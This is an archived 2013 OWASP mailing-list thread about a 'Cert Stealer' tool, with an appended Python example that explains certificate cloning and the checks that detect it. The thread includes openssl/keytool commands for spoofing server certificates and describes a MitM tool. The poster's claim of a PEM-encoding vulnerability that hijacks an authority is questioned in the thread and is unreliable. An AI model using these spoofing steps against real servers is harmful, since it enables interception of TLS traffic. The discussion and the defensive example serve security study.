[Owasp-leaders] Cert Stealer Released

Tim tim.morgan at owasp.org
Thu Dec 26 19:49:40 UTC 2013


My best guess is that he's reading the certificate, generating a new
key pair and then associating the certificate properties with his new
public/private key.  This does have quite a bit of utility.
Certificate verification can partially fail in a variety of ways,
particularly when dealing with appliances.  For instance, sometimes people add
special non-standard properties to certificates for
application-specific authorization checks.  So the more certificate
properties you spoof accurately, the better chances are of success if
the verification is incomplete.

I have a private MitM tool I wrote that does the same thing all in
Python, albeit imperfectly.  It just generates new certificates on the
fly after ripping the public details off of the server side.  I showed
this code to the guys who build Mallory[1] a while back and they copied
the idea (but not the code) into their tool.  I imagine Burp probably
does something similar in some of its certificate generation options,
though I haven't checked if it copies more than just the Subject.

tim

1. https://intrepidusgroup.com/insight/mallory/


On Thu, Dec 26, 2013 at 02:40:48PM -0500, Abbas Naderi wrote:
> Maybe the PEM you’re using is not a cert, but a private key. They are both encoded into PEM files. If you have the private key, then you don’t need to exploit it! You already have it.
> 
> And BTW what's the practical use of this, I mean have you used it anywhere? How can it be used to exploit something.
> -A
> On Dec 26, 2013, at 2:38 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
> 
> > openssl s_client -showcerts -connect $host:$port > $keyring.pem; 
> > openssl x509 -in $keyring.pem  -pubkey > $keyring.cer;
> > keytool -keystore $ks --importcert --alias $keyring.pem -file $keyring.pem -storepass $passwd -noprompt;
> > keytool -genkey -alias $keyring.key -keyalg RSA -keystore $ks -storepass $passwd -noprompt
> > keytool -v -importkeystore -srckeystore $ks -srcalias $keyring.key -destkeystore $keyring.p12 -file $keyring.p12 -deststoretype PKCS12 -storepass $passwd -noprompt
> > openssl pkcs12 -in $keyring.p12 -out $keyring.key -passin pass:$passwd
> > echo "Stealing CA"
> > cat $keyring.key >> $keyring.pem
> > openssl x509 -inform pem -in $keyring.pem -out ca-$keyring.crt -signkey $keyring.key -CA $keyring.key -CAcreateserial 
> > 
> > This is how I exactly do it, they are checking for public key and private key, I'm not sure why openssl lets you resign as a key. But here is the source for the exploit. 
> > 
> > On 12/26/13, 11:35 AM, Abbas Naderi wrote:
> >> I didn’t quite understand. What does the encoding vulnerability expose? SSL certs are public-keys plus a bunch of other data. There is no private key inside to extract and resign another certificate with.
> >> -A
> >> On Dec 26, 2013, at 2:32 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
> >> 
> >>> I think a fair description would be it simplifies spoofing certs. This started out as a proof of concept a year ago when I realized there was a vulnerability in PEM encoding of SSL certs, So I chain-loaded a java key store which was converted to key, then resigned the cert with the chain-loaded key, thus keeping the context of the original certificate with a hijacked authority. 
> >>> On 12/26/13, 11:21 AM, Abbas Naderi wrote:
> >>>> Well a description of what this does would be a good idea to start with…
> >>>> -A
> >>>> On Dec 26, 2013, at 2:18 PM, Gregory Disney <gregory.disney at owasp.org> wrote:
> >>>> 
> >>>>> I'm working on the documentation. It works via turning a keytool pk12 to openssl key, then embedding the key on the root ca and resigning with the embedded key.
> >>>>> On 12/26/13, 10:47 AM, Dinis Cruz wrote:
> >>>>>> Hi Gregory, where can I find the details of how this works?
> >>>>>> 
> >>>>>> Thx
> >>>>>> 
> >>>>>> Dinis
> >>>>>> 
> >>>>>> On 26 Dec 2013 07:44, "Gregory Disney" <gregory.disney at owasp.org> wrote:
> >>>>>> Screen shot of successfully spoofed certs:
> >>>>>> http://image-store.slidesharecdn.com/f6ff3390-6dfc-11e3-8ed6-22000a9193db-original.png
> >>>>>> Each of these certs has been tested and is capable of creating SSL sessions.
> >>>>>> Cert Stealer:
> >>>>>> https://gist.github.com/gdisneyleugers/8129304
> >>>>>> -Greg
> >>>>>> _______________________________________________
> >>>>>> OWASP-Leaders mailing list
> >>>>>> OWASP-Leaders at lists.owasp.org
> >>>>>> https://lists.owasp.org/mailman/listinfo/owasp-leaders
> >>>>> 
> >>>> 
> >>> 
> >> 
> > 
> 
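The technique Tim describes above, a certificate's public properties copied onto a fresh key pair, shown beside the checks that do and do not catch it, as an added example that is not code from the thread or from the Cert Stealer gist. It assumes the third-party `cryptography` package; the CA, hostname and certificates are constructed for the demonstration.

```python
# Added example: a constructed test CA issues a genuine server certificate,
# the certificate's copyable fields are reproduced on a new key pair, and two
# verification routines show why checking fields alone is not enough.
import datetime, hashlib
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa

HOST = "www.example.test"  # constructed test hostname

def _build(subject, issuer, signing_key, public_key, serial=None):
    now = datetime.datetime.now(datetime.timezone.utc)
    return (x509.CertificateBuilder().subject_name(subject).issuer_name(issuer)
            .public_key(public_key).serial_number(serial or x509.random_serial_number())
            .not_valid_before(now).not_valid_after(now + datetime.timedelta(days=30))
            .add_extension(x509.SubjectAlternativeName([x509.DNSName(HOST)]), critical=False)
            .sign(signing_key, hashes.SHA256()))

# Constructed PKI: a test CA issues the genuine server certificate.
CA_KEY = rsa.generate_private_key(public_exponent=65537, key_size=2048)
CA_NAME = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Example Test CA")])
SERVER_KEY = rsa.generate_private_key(public_exponent=65537, key_size=2048)
SERVER_NAME = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, HOST)])
GENUINE = _build(SERVER_NAME, CA_NAME, CA_KEY, SERVER_KEY.public_key())

def clone_with_new_key(cert):
    """Same subject, issuer name, SAN and serial on a fresh key, signed by that key."""
    new_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    return _build(cert.subject, cert.issuer, new_key, new_key.public_key(),
                  cert.serial_number)

def spki_sha256(cert):
    """SHA-256 of the SubjectPublicKeyInfo, the value a public-key pin stores."""
    der = cert.public_key().public_bytes(serialization.Encoding.DER,
                                         serialization.PublicFormat.SubjectPublicKeyInfo)
    return hashlib.sha256(der).hexdigest()

def weak_check(cert, hostname):
    """Looks only at a field the clone reproduces exactly, so it accepts the clone."""
    return cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)[0].value == hostname

def strong_check(cert, hostname, ca_public_key, pinned_spki):
    """Hostname, a valid signature by the expected issuer and the SPKI pin must all hold."""
    try:
        ca_public_key.verify(cert.signature, cert.tbs_certificate_bytes,
                             padding.PKCS1v15(), cert.signature_hash_algorithm)
    except InvalidSignature:
        return False  # the clone's signature was made with its own key, not the CA's
    return weak_check(cert, hostname) and spki_sha256(cert) == pinned_spki
```

The two checks that catch the clone, the issuer signature and the SPKI pin, are exactly the ones an incomplete appliance-side verification tends to skip.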